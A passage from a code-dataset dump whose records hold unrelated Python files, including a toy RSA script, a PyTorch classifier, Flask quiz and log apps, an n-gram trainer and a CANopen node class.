q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n while q == p:\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n n = p * q\n phi = (p - 1) * (q - 1)\n\n e = randrange(phi)\n while gcd(e, phi) != 1:\n e = randrange(phi)\n\n d = multiplicative_inverse(e, phi)\n \n if verbose == True:\n print(\"p = %d\" % p)\n print(\"q = %d\" % q)\n print(\"n = %d\" % n)\n print(\"phi = %d\" % phi)\n print(\"e = %d\" % e)\n print(\"d = %d\" % d)\n\n return KeyPair(public=Key(e, n), private=Key(d, n))\n\ndef encrypt(message, public_key):\n \"\"\"Encripta uma string mensagem aplicando uma chave pública RSA.\"\"\"\n chunk_size = int(log(public_key.mod, 256))\n binary_message = b64encode(message.encode())\n result = []\n \n for i in range(0, len(binary_message), chunk_size):\n chunk = binary_message[i:i+chunk_size]\n plain = 0\n for byte in reversed(chunk):\n plain *= 256\n plain += byte\n coded = modular_pow(plain, public_key.exp, public_key.mod)\n result.append(hex(coded)[2:])\n return \":\".join(result)\n\ndef decrypt(cypher, private_key):\n \"\"\"Decripta um código aplicando uma chave privada RSA.\"\"\"\n result = []\n for chunk in cypher.split(\":\"):\n coded = int(chunk, 16)\n plain = modular_pow(coded, private_key.exp, private_key.mod)\n result.append(plain % 256)\n while plain > 0:\n plain = plain // 256\n result.append(plain % 256)\n return b64decode(bytes(result)).decode()\n\ndef main():\n keys = generate_keys(True)\n print()\n\n print(\"Public key =\", keys.public)\n print(\"Private key =\", keys.private)\n print()\n\n message = \"Isto é uma mensagem em português. àÀáÁãÃçÇéÉêÊÍíóÓúÚüÜ\"\n print(\"message = \\\"%s\\\"\" % message)\n print()\n\n cypher = encrypt(message, keys.public)\n print(\"cypher =\", cypher)\n print()\n\n decrypted = decrypt(cypher, keys.private)\n print(\"decrypted = \\\"%s\\\"\" % decrypted)\n print()\n\n assert message == decrypted\n\nif __name__ == '__main__':\n main()","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"79137217","text":"import unittest\nfrom ctci.c2.p21 import dedups\nfrom ds.linkedlist import LinkedListNode\n\nclass TestDedups(unittest.TestCase):\n\n def test_dedups_none(self):\n head = None\n dedups(head)\n self.assertTrue(head is None)\n\n def test_dedups_one(self):\n head = LinkedListNode(0, None)\n dedups(head)\n self.assertTrue(head.next is None)\n\n","sub_path":"ctci/c2/test_p21.py","file_name":"test_p21.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16902107","text":"# -*- coding: utf-8 -*-\n\nimport time\n\ndef main():\n i = 0\n while i <= 10000:\n print (i)\n i += 1\n\nif __name__ == \"__main__\":\n \n #簡単に処理時間を計測してみる\n start = time.time()\n \n main()\n\n elapsedTime = time.time() - start\n\n print(\"処理速度:{0}\".format(elapsedTime))\n","sub_path":"Other/elapsed_time.py","file_name":"elapsed_time.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402449910","text":"import os\r\nimport shutil\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.optim.lr_scheduler import StepLR\r\nimport subprocess\r\nfrom pathlib import Path\r\nimport random\r\n\r\nclass Net(nn.Module):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n \r\n #1 input image channel, 32 output channel, 3*3 square convolution kernel\r\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\r\n \r\n #32 input channels,64 output channedl, 3*3 square convolution kernel\r\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\r\n \r\n #nn.Dropout2d() will help promote independence between feature maps and should be used instead.\r\n #torch.nn.Dropout2d\r\n self.dropout1 = nn.Dropout2d(0.25)\r\n self.dropout2 = nn.Dropout2d(0.5)\r\n \r\n #apply a linear transformation to the incoming data:y=xA+b,torch.nn.Linear(in_features: int, out_features: int, bias: bool = True)\r\n self.fc1 = nn.Linear(12544, 128)\r\n self.fc2 = nn.Linear(128, 2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n #print(\"Size after conv1:\",x.size())\r\n x = F.relu(x)\r\n x = self.conv2(x)\r\n x = F.relu(x)\r\n #print(\"Size after cov2:\",x.size())\r\n x = F.max_pool2d(x, 2)\r\n\r\n #print(\"Size after pooling:\",x.size())\r\n x = self.dropout1(x)\r\n \r\n #Flattens a contiguous range of dims in a tensor\r\n x = torch.flatten(x, 1)\r\n #print(\"Size after flattern:\", x.size())\r\n \r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n x = self.dropout2(x)\r\n x = self.fc2(x)\r\n output = F.log_softmax(x, dim=1)\r\n return output\r\n\r\ndef select_train_images(ins_list,em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_train_data/class_A',cr_destination='lidar_train_data/class_B'):\r\n num_cr=0\r\n num_em=0\r\n for ins in ins_list:\r\n if ins['cr']==\"crowded\":\r\n num_cr+=1\r\n elif ins['cr']==\"empty\":\r\n num_em+=1\r\n \r\n cr_image_list=os.listdir(cr_data_path)\r\n #print(cr_image_list)\r\n selected_cr_image_list=random.sample(cr_image_list,k=num_cr)\r\n \r\n em_image_list=os.listdir(em_data_path)\r\n #print(em_image_list)\r\n selected_em_image_list=random.sample(em_image_list,k=num_em)\r\n \r\n for f1 in selected_cr_image_list:\r\n shutil.copy(cr_data_path+\"/\"+f1,cr_destination)\r\n for f2 in selected_em_image_list:\r\n shutil.copy(em_data_path+\"/\"+f2,em_destination)\r\n \r\n print(\"Lidar train data is generated\")\r\n \r\ndef select_test_images(em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_test_data/class_A',cr_destination='lidar_test_data/class_B'):\r\n cr_image_list=os.listdir(cr_data_path)\r\n em_image_list=os.listdir(em_data_path)\r\n selected_em_image_list=random.sample(em_image_list,k=50)\r\n selected_cr_image_list=random.sample(cr_image_list,k=50)\r\n \r\n for f1 in selected_em_image_list:\r\n shutil.move(em_data_path+\"/\"+f1,em_destination)\r\n \r\n for f2 in selected_cr_image_list:\r\n shutil.move(cr_data_path+\"/\"+f2,cr_destination)\r\n\r\n print(\"Lidar test data is generated\")\r\n\r\ndef delete_train_images():\r\n shutil.rmtree(\"lidar_train_data/class_A\")\r\n shutil.rmtree(\"lidar_train_data/class_B\")\r\n os.makedirs(\"lidar_train_data/class_A\")\r\n os.makedirs(\"lidar_train_data/class_B\")\r\n \r\ndef delete_test_images():\r\n shutil.rmtree(\"lidar_test_data/class_A\")\r\n shutil.rmtree(\"lidar_test_data/class_B\")\r\n os.makedirs(\"lidar_test_data/class_A\")\r\n os.makedirs(\"lidar_test_data/class_B\")\r\n","sub_path":"perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425748924","text":"import random\r\nimport os\r\nimport datetime\r\nimport json\r\nfrom flask import Flask,request,render_template,Response\r\n\r\n\r\napp = Flask(__name__)\r\n\r\ndatamain = {}\r\n\r\nclass session:\r\n def __init__(self,name):\r\n self.jsonfile = os.getcwd()\r\n self.time = datetime.datetime.now()\r\n self.quest = []\r\n self.answer = []\r\n self.useranswers = []\r\n self.stage = 0\r\n if os.path.exists(self.jsonfile + '/baza/' + name + \".json\"):\r\n with open(self.jsonfile + '/baza/' + name + \".json\",'r') as js:\r\n mainj = json.load(js)\r\n else:\r\n data = {\"id\": name, \"rightanswers\": 0}\r\n with open(self.jsonfile + '/baza/' + name + \".json\", 'w', encoding='UTF-8') as js:\r\n json.dump(data, js, ensure_ascii=False)\r\n self.questgenerate()\r\n\r\n def endthis(self):\r\n result = \"\"\r\n for a in range(5):\r\n if self.answer[a] == self.useranswers[a]:\r\n result += \"
\" + str((a+1)) + \". Дан правильный ответ. \"\r\n else:\r\n result += \"
\" + str((a+1)) + \". Дан неправильный ответ. \" + str(self.answer[a])\r\n return result\r\n\r\n def questgenerate(self):\r\n bignumbs = random.randint(10, 32) * 100000\r\n\r\n middlenumbs = random.randint(16, 30) * 1000\r\n smallnumbs = random.randint(120, 1000)\r\n tinynumbs = random.randint(4, 12)\r\n print(bignumbs,middlenumbs,smallnumbs,tinynumbs)\r\n t = random.sample(range(1,6), 5)\r\n with open(\"quest.json\") as js:\r\n quests = json.load(js)\r\n for a in range(0,5):\r\n print(t)\r\n self.quest.append(quests[\"q\" + str(t[a])])\r\n if t[a] == 1:\r\n self.answer.append(round((middlenumbs + middlenumbs*4/5 + middlenumbs/2 + middlenumbs/4),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(middlenumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(middlenumbs/2))\r\n elif t[a] == 2:\r\n self.answer.append(round((middlenumbs * 1.2 / ((tinynumbs + 3 )/100)*12 / (tinynumbs - 2)),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(tinynumbs - 2))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(tinynumbs + 3))\r\n self.quest[a] = self.quest[a].replace(\"*2%\", str(middlenumbs * 1.2))\r\n elif t[a] == 3:\r\n self.answer.append(round((((round(bignumbs * random.uniform(1,1.5))) / bignumbs-1)/4*100),2))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(bignumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(round(bignumbs * random.uniform(1,1.5))))\r\n print((bignumbs * 1.3 / bignumbs-1)/4*100)\r\n print(bignumbs)\r\n print(bignumbs)\r\n elif t[a] == 4:\r\n self.answer.append(round((smallnumbs * 1.5 - smallnumbs),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(smallnumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(smallnumbs * 1.5))\r\n elif t[a] == 5:\r\n self.answer.append(round((bignumbs *0.1 + bignumbs),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(bignumbs))\r\n\r\n\r\n\r\n\r\n@app.route('/res',methods=['GET'])\r\ndef hello_wor():\r\n nameandf = request.args.get('name')\r\n id = request.args.get('id')\r\n results = request.args.get('tasks')\r\n print(results)\r\n return render_template('ind.html',results = results)\r\n\r\n\r\n@app.route('/f',methods=['GET'])\r\ndef hello_worl():\r\n nameandf = request.args.get('name')\r\n id = request.args.get('id')\r\n return render_template('inde.html',name=nameandf,id = id,val1=random.randint(16000, 30000),val2 = random.randint(4, 12),val3 = random.randint(1000000, 3200000),val4 = random.randint(120, 1000),val5 = random.randint(100000, 500000))\r\n\r\n@app.route('/',methods=['GET','POST'])\r\ndef hello_world():\r\n if request.method == 'GET':\r\n return render_template('inde.html')\r\n else:\r\n data = request.get_json()\r\n if data[\"type\"] == 'e':\r\n if data[\"name\"] in datamain:\r\n if datamain[data[\"name\"]].stage == 0:\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n else:\r\n datamain[data['name']] = session(data['name'])\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n elif data['type'] == 'r':\r\n datamain[data[\"name\"]].useranswers.append(data[\"answ\"])\r\n if(datamain[data[\"name\"]].stage != 5):\r\n datamain[data[\"name\"]].stage += 1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n else:\r\n dat = datamain[data[\"name\"]].endthis()\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n #if request.method == 'GET':\r\n # print(request.args)\r\n #return render_template('index.html')\r\n","sub_path":"FuckYou.py","file_name":"FuckYou.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271133869","text":"import config\nimport logging\nimport requests\n\nTREESTATUS_URL = 'https://treestatus.mozilla-releng.net/trees/'\n\nlogger = logging.getLogger('autoland')\n\n\ndef tree_is_open(tree):\n # treestatus running in dev/CI is an older version, with slightly\n # different request and response structures.\n is_test_env = config.testing()\n\n r = None\n try:\n if is_test_env:\n r = requests.get('http://treestatus/%s?format=json' % tree)\n else:\n r = requests.get(TREESTATUS_URL + tree)\n\n if r.status_code == 200:\n if is_test_env:\n return r.json()['status'] == 'open'\n else:\n return r.json()['result']['status'] == 'open'\n\n elif r.status_code == 404:\n # We assume unrecognized trees are open\n return True\n\n else:\n logger.error('Unexpected response from treestatus API '\n 'for tree \"%s\": %s' % (tree, r.status_code))\n except KeyError:\n logger.error('Malformed response from treestatus API '\n 'for tree \"%s\"' % tree)\n if r is not None:\n logger.debug(r.json())\n except Exception as e:\n logger.error('Failed to determine treestatus for %s: %s' % (tree, e))\n\n return False\n\n","sub_path":"autoland/autoland/treestatus.py","file_name":"treestatus.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101876903","text":"T=10\nfor tc in range(T):\n num=int(input())\n exp=input()\n postfix=[]\n op=[]\n for i in exp:\n if i=='(':\n op.append(i)\n elif i==')':\n while op:\n if op[-1]=='(':\n op.pop()\n break\n postfix.append(op.pop())\n elif i=='+':\n if op and op[-1]=='*':\n while op:\n if op[-1]=='(':\n break\n postfix.append(op.pop())\n op.append(i)\n elif i=='*':\n op.append(i)\n else:\n postfix.append(i)\n while op:\n postfix.append(op.pop())\n stack=[]\n for i in postfix:\n if i=='*':\n stack.append(stack.pop()*stack.pop())\n elif i=='+':\n stack.append(stack.pop() + stack.pop())\n else:\n stack.append(int(i))\n print(f'#{tc+1} {stack[0]}')","sub_path":"1224.py","file_name":"1224.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"380569203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 29 05:29:37 2021\n\n@author: lindemberg\n\"\"\"\n\nimport requests\nimport json \n\ndef formata_dados(dados_paises):\n sigla = \"\"\n pais = \"\"\n fronteiras = []\n dados_formatado = \"SIGLA | PAÍS\"+(16* \" \") + \"| FRONTEIRAS\\n\" \n \n for dados in dados_paises:\n sigla = dados[\"code\"]\n pais = dados[\"name\"]\n fronteiras = dados[\"fronteiras\"]\n dados_formatado += sigla +\" | \" + pais + (20-len(pais)) * \" \" + \"| \" + str(fronteiras) + \" - (\" + str(len(fronteiras)) +\" país(es) faz(em) fronteira)\\n\" \n \n return dados_formatado \n\ndef ordena_decrescente(dados_paises):\n for i in range(len(dados_paises)-1):\n for j in range(i+1,len(dados_paises)):\n if len(dados_paises[i][\"fronteiras\"]) < len(dados_paises[j][\"fronteiras\"]):\n dados_paises[i] , dados_paises[j] = dados_paises[j] , dados_paises[i]\n \n# captura os dados da API, seguido da lista de dados dos paises do tipo dicionário(dict)\ndados_paises = requests.get(\"http://www.amock.io/api/fcmaia/countries\")\nlista_de_dic_paises = json.loads(dados_paises.content)\n\n#mostra como os dados foram capturados sem uma ordenação \nprint(\"SEQUENCIA FORMATADA DOS DADOS CONFORME CAPTURADO DA API\")\nprint(formata_dados(lista_de_dic_paises))\n\n#realiza a ordenação em ordem descrescente, levando em consideração a quantidade de fronteiras que cada país tem\nordena_decrescente(lista_de_dic_paises)\n\n#mostra a lista ordenada \nprint(\"SEQUENCIA ORDENADA, CONFORME A QUANTIDADE DE FRONTEIRAS\")\nprint(formata_dados(lista_de_dic_paises))","sub_path":"fronteira.py","file_name":"fronteira.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635505048","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Class, designed to search for sources.\n\"\"\"\n# built-ins\nimport os\nfrom pathlib import Path\nfrom typing import List, Optional, Generator, Tuple, Dict\n\n# modules of the project\nfrom essence.machine import settings\nfrom essence.machine.model.utils import find_metafiles, load_as_json, get_file_extension\nfrom essence.utils import exceptions\nfrom essence.utils.containeer_abstract import ContainerAbstract\nfrom essence.utils.common import s_type, decorate\nfrom essence.utils.helpers import Meta, Uri\n\nMetas = Dict[Uri, Meta]\n\n\nclass Locator(ContainerAbstract):\n \"\"\"Class, designed to search for sources.\n \"\"\"\n FILE_TYPE = 'yml'\n _bound_type = Meta\n _raise_on_absence = exceptions.MetaDoesNotExistError\n _raise_on_overwrite = exceptions.MetaAlreadyExistError\n\n def __init__(self, metas: Optional[Metas] = None) -> None:\n \"\"\"Instantiate.\n \"\"\"\n self._storage: Metas = metas or {}\n\n def __repr__(self) -> str:\n \"\"\"Return string representation.\n \"\"\"\n return s_type(self) + f'({self.FILE_TYPE})'\n\n def discover(self, path: Optional[Path] = None) -> None:\n \"\"\"Find and save meta instances for all metafiles.\n \"\"\"\n for meta in self.search_metafiles(path):\n self.add(meta)\n\n if not self:\n raise exceptions.NoStoriesFoundError(decorate(\n f'Not a single story has been found!'\n ))\n\n def search_metafiles(self, path: Optional[Path] = None) -> Generator[Meta, None, None]:\n \"\"\"Get metas for all folders with stories in them.\n \"\"\"\n metafiles = find_metafiles(path)\n\n for filename in metafiles:\n contents = load_as_json(filename)\n # noinspection PyArgumentList\n meta = self._bound_type(**contents, uri=filename.parent.name, path=filename)\n yield meta\n\n # pylint: disable=W0221\n def iterate_over_content(self, story_name: str) -> Generator[Tuple[str, Path], None, None]:\n \"\"\"Iterate over all filenames.\n \"\"\"\n for meta in self.values():\n if meta.uri != story_name:\n continue\n\n base_path = meta.path.parent\n\n for path, _, files in os.walk(str(base_path.absolute())):\n for file in files:\n full_path = Path(path) / file.lower()\n if (file != settings.META_FILE_NAME and\n get_file_extension(full_path) == self.FILE_TYPE):\n yield self.FILE_TYPE, full_path\n\n def get_stories(self) -> List[Tuple[str, str]]:\n \"\"\"Get uris and names for all known stories.\n \"\"\"\n titles = [(x.uri, x.name) for x in self.values()]\n return titles\n","sub_path":"essence/machine/model/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14599343","text":"import re\nimport sys\nfrom .common_errors import CommonErrors\nfrom .corpora import OANCCorpus, TestCorpus\nfrom .serial import Cereal\n\n\nclass Trainer:\n def __init__(self, reduced=True, corpus=OANCCorpus, corrections=True, serializer=Cereal):\n if corrections:\n self.corpus = corpus(errors=CommonErrors)\n else:\n self.corpus = corpus()\n self.reduced = reduced\n self.serializer = serializer()\n self.data = {}\n self.unigrams_list = []\n self.bigrams_list = []\n self.trigrams_list = []\n self.read_corpus()\n self.train()\n\n def read_corpus(self):\n for line in self.corpus.read_corpus():\n self.unigrams_list += self.words(line)\n self.bigrams_list += self.bigrams(line)\n self.trigrams_list += self.trigrams(line)\n\n def train(self):\n unigram_count = self.train_model(self.unigrams_list)\n bigram_count = self.train_model(self.bigrams_list)\n trigram_count = self.train_model(self.trigrams_list)\n if self.reduced:\n unigram_count = self.reduce(unigram_count)\n bigram_count = self.reduce(bigram_count)\n trigram_count = self.reduce(trigram_count)\n unigram_probs = self.get_probs(unigram_count)\n bigram_probs = self.get_probs(bigram_count)\n trigram_probs = self.get_probs(trigram_count)\n self.norm(unigram_probs)\n self.norm(bigram_probs)\n self.norm(trigram_probs)\n self.data['unigram_count'] = unigram_count\n self.data['unigram_probs'] = unigram_probs\n self.data['bigram_probs'] = bigram_probs\n self.data['trigram_probs'] = trigram_probs\n\n def reduce(self, count):\n new_count = {}\n for key, value in count.items():\n if value > 1:\n new_count[key] = value\n return new_count\n\n def pickle(self):\n name = self.corpus.name\n self.serializer.serialize(name, self.data)\n\n def norm(self, probs):\n pmax = max(probs.values())\n pmin = min(probs.values())\n denom = pmax - pmin\n if denom == 0:\n denom = 1\n for key, value in probs.items():\n probs[key] = ((value - pmin) / denom)\n\n def get_probs(self, count):\n prob_dict = {}\n denom = sum(count.values())\n for gram in count:\n prob_dict[gram] = (count[gram] / denom)\n return prob_dict\n\n def bigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 1):\n l.append((mod_line[i], mod_line[i + 1]))\n return l\n\n def trigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 2):\n l.append((mod_line[i], mod_line[i + 1], mod_line[i + 2]))\n return l\n\n def words(self, text):\n l = re.findall('[a-z\\']+', text.lower())\n return l\n\n def train_model(self, features):\n model = {}\n for f in features:\n if f in model:\n model[f] += 1\n else:\n model[f] = 1\n return model\n\n\ndef whathappened(time, unis, bis, tris):\n print(\"Took: \" + str(time) + \" seconds\")\n print(\"Added: \" + str(unis) + \" unigrams\")\n print(\"Added: \" + str(bis) + \" bigrams\")\n print(\"Added: \" + str(tris) + \" trigrams\")\n\nif __name__ == \"__main__\":\n import time\n corpus = OANCCorpus\n corrections = CommonErrors\n reduced = True\n if 'test' in sys.argv:\n corpus = TestCorpus\n corrections = None\n reduced = False\n start = time.clock()\n t = Trainer(corrections=corrections, corpus=corpus, reduced=reduced)\n t.pickle()\n end = time.clock() - start\n unis = len(t.data['unigram_probs'].keys())\n bis = len(t.data['bigram_probs'].keys())\n tris = len(t.data['trigram_probs'].keys())\n whathappened(end, unis, bis, tris)\n","sub_path":"app/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191609057","text":"import matplotlib.pyplot as plt\n\n# set up x values and y values\n\nx_values = list(range(5000))\ny_values = [x**3 for x in x_values]\n\n# set the title of the plot\nplt.title('Cubic Values', fontsize=15)\n\n# set the axes of the plot\nplt.xlabel('Values', fontsize=10)\nplt.ylabel('Cubic Values', fontsize=10)\n\n# set the scale\nplt.tick_params(axis='both', which='major', labelsize=5)\n# draw the plot\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, s=20)\nplt.show()\n\n\n\n","sub_path":"practice/15.02_cubic_diagram.py","file_name":"15.02_cubic_diagram.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163274178","text":"#!/usr/bin/python\nimport fresh_tomatoes\nimport media\n\n\ndef main():\n shawshank = media.Movie(\"The Shawshank Redemption\",\n \"An innocent man escapes from prison.\",\n 1994,\n \"http://ia.media-imdb.com/images/M/MV5BODU4MjU4N\" +\n \"jIwNl5BMl5BanBnXkFtZTgwMDU2MjEyMDE@._V1_SX214_A\" +\n \"L_.jpg\",\n \"https://www.youtube.com/watch?v=6hB3S9bIaco\",\n 9.3)\n\n love_actually = media.Movie(\"Love Actually\",\n \"Intertangled romance ensues over Christmas.\",\n 2003,\n \"http://ia.media-imdb.com/images/M/MV5BMTY4N\" +\n \"jQ5NDc0Nl5BMl5BanBnXkFtZTYwNjk5NDM3._V1_SX2\" +\n \"14_AL_.jpg\",\n \"https://www.youtube.com/watch?v=KdzH6a-XEGM\",\n 7.7)\n\n wedding_crashers = media.Movie(\"Wedding Crashers\",\n \"Two guys crash weddings and fall in love.\",\n 2005,\n \"http://ia.media-imdb.com/images/M/MV5BM\" +\n \"Tc4NTUyNzU4MV5BMl5BanBnXkFtZTcwMzcyMTky\" +\n \"MQ@@._V1_SX214_AL_.jpg\",\n \"https://www.youtube.com/watch?v=VYrEQbt\" +\n \"V2V4\",\n 7.0)\n\n amelie = media.Movie(\"Amelie\",\n \"A young eccentric French girl tries to find the\" +\n \" origin of some mysterious photos.\",\n 2001,\n \"http://ia.media-imdb.com/images/M/MV5BMTYzNjkxMT\" +\n \"czOF5BMl5BanBnXkFtZTgwODg5NDc2MjE@._V1_SY317_CR0,0\" +\n \",214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=sECzJY07oK4\",\n 8.4)\n\n mohicans = media.Movie(\"The Last of the Mohicans\",\n \"An innocent man escapes from prison.\",\n 1992,\n \"http://ia.media-imdb.com/images/M/MV5BMTQ0MjQ5ND\" +\n \"AzMV5BMl5BanBnXkFtZTcwNjYzMjE2MQ@@._V1_SY317_CR8\" +\n \",0,214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=yaQeVnN6pUc\",\n 7.8)\n\n once = media.Movie(\"Once\",\n \"Two buskers in Dublin are star-crossed.\",\n 2006,\n \"http://ia.media-imdb.com/images/M/MV5BMTEwNjExOTc2MT\" +\n \"JeQTJeQWpwZ15BbWU3MDYzODQ3NDE@._V1_SY317_CR0,0,214,3\" +\n \"17_AL_.jpg\",\n \"https://www.youtube.com/watch?v=FWJIylZ8VyM\",\n 7.9)\n\n my_faves = [shawshank, love_actually, wedding_crashers, amelie, mohicans,\n once]\n\n # Send my favorite movies to Fresh Tomatoes HTML generator\n fresh_tomatoes.open_movies_page(my_faves)\n\nif __name__ == '__main__':\n main()","sub_path":"entertainment_console.py","file_name":"entertainment_console.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646283220","text":"from .sdo import SdoClient\nfrom .nmt import NmtMaster\nfrom .emcy import EmcyConsumer\nfrom .pdo import PdoNode\nfrom . import objectdictionary\n\n\nclass Node(object):\n \"\"\"A CANopen slave node.\n\n :param int node_id:\n Node ID (set to None or 0 if specified by object dictionary)\n :param object_dictionary:\n Object dictionary as either a path to a file, an ``ObjectDictionary``\n or a file like object.\n :type object_dictionary: :class:`str`, :class:`canopen.ObjectDictionary`\n \"\"\"\n\n def __init__(self, node_id, object_dictionary):\n self.network = None\n\n if not isinstance(object_dictionary,\n objectdictionary.ObjectDictionary):\n object_dictionary = objectdictionary.import_od(\n object_dictionary, node_id)\n self.object_dictionary = object_dictionary\n\n self.id = node_id or self.object_dictionary.node_id\n\n #: Enable WORKAROUND for reversed PDO mapping entries\n self.curtis_hack = False\n\n self.sdo = SdoClient(0x600 + self.id, 0x580 + self.id, object_dictionary)\n self.pdo = PdoNode(self)\n self.nmt = NmtMaster(self.id)\n self.emcy = EmcyConsumer()\n\n def associate_network(self, network):\n self.network = network\n self.sdo.network = network\n self.pdo.network = network\n self.nmt.network = network\n network.subscribe(self.sdo.tx_cobid, self.sdo.on_response)\n network.subscribe(0x700 + self.id, self.nmt.on_heartbeat)\n network.subscribe(0x80 + self.id, self.emcy.on_emcy)\n\n def remove_network(self):\n self.network.unsubscribe(self.sdo.tx_cobid)\n self.network.unsubscribe(0x700 + self.id)\n self.network.unsubscribe(0x80 + self.id)\n self.network = None\n self.sdo.network = None\n self.pdo.network = None\n self.nmt.network = None\n\n def store(self, subindex=1):\n \"\"\"Store parameters in non-volatile memory.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1010, subindex, b\"save\")\n\n def restore(self, subindex=1):\n \"\"\"Restore default parameters.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1011, subindex, b\"load\")\n","sub_path":"canopen/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541157851","text":"from flask import render_template, request, jsonify, abort\nimport logging\nimport json\nimport os\nimport re\nfrom datetime import datetime, date\n\nfrom app import app\nfrom loggers import request_file_hendler\nfrom config import base_dir\n\n\ndef get_file_name(log_name):\n\t\"\"\"Return name of the file from app config error.log/request.log\"\"\"\n\tif log_name == 'errors':\n\t\treturn app.config['ERROR_LOG_FILE']\n\telse:\n\t\treturn app.config['REQUEST_LOG_FILE']\n\ndef get_error_name(stacktrace):\n\t\"\"\"Parse the stacktrace of error and return name of Error\"\"\"\n\tlines = stacktrace.split('\\n')\n\tlast_line = lines[len(lines) - 2]\n\tresult = re.search(r'^(\\w+Error)', last_line);\n\treturn result.group(0)\n\ndef get_list_of_errors(full_log, **kvargs):\n\t\"\"\"Return list of errors from error.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\terrors_type -- list of errors which user enter in front (default \"\" i.e. All)\n\t\tdate -- datetime(%Y-%m-%d) date which user enter in front \n\t\t\t\t(in start date=\"\" i.e. All date, if user didn't enter date,\n\t\t\t\t date=today datetime(%Y-%m-%d))\n\t}\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (.*?)(Traceback .*?)##',\n\t\tfull_log, re.S)\n\t# For all type of errors create a list of dictionaries \n\t# with information about error.\n\tif not kvargs['errors_type']:\n\t\terrors = 